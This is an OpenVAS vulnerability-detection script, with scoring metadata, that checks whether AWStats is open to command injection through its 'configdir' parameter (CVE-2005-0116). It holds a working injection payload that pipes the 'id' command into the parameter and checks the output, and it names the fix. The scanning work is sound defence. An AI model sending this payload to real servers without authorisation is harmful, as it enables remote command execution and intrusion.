AWStats 'configdir' Parameter Arbitrary Command Execution Vulnerability

2005-11-0300:00:00

plugins.openvas.org

6.5 Medium

AI Score

Confidence

Low

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.972 High

EPSS

Percentile

99.8%

JSON

AWStats is prone to a command execution vulnerability.

# SPDX-FileCopyrightText: 2005 David Maciejak
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:awstats:awstats";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.16189");
  script_version("2023-08-01T13:29:10+0000");
  script_cve_id("CVE-2005-0116");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/12270");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/12298");
  script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_name("AWStats 'configdir' Parameter Arbitrary Command Execution Vulnerability");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2005 David Maciejak");
  script_family("Web application abuses");
  script_dependencies("awstats_detect.nasl");
  script_mandatory_keys("awstats/installed");

  script_tag(name:"summary", value:"AWStats is prone to a command execution vulnerability.");

  script_tag(name:"insight", value:"The remote version of this software is prone to an input
  validation vulnerability. The issue is reported to exist because user supplied 'configdir' URI
  data passed to the 'awstats.pl' script is not sanitized.");

  script_tag(name:"impact", value:"An attacker may exploit this condition to execute commands remotely or disclose
  contents of web server readable files.");

  script_tag(name:"solution", value:"Upgrade at least to version 6.3 of this software.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_vul");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("list_array_func.inc");
include("port_service_func.inc");

if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
if( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );

http_check_remote_code(
                        unique_dir:dir,
                        extra_check:"Check config file, permissions and AWStats documentation",
                        check_request:"/awstats.pl?configdir=|echo%20Content-Type:%20text/html;%20echo%20;id|%00",
                        check_result:"uid=[0-9]+.*gid=[0-9]+.*",
                        command:"id",
                        port:port
                        );

exit( 99 );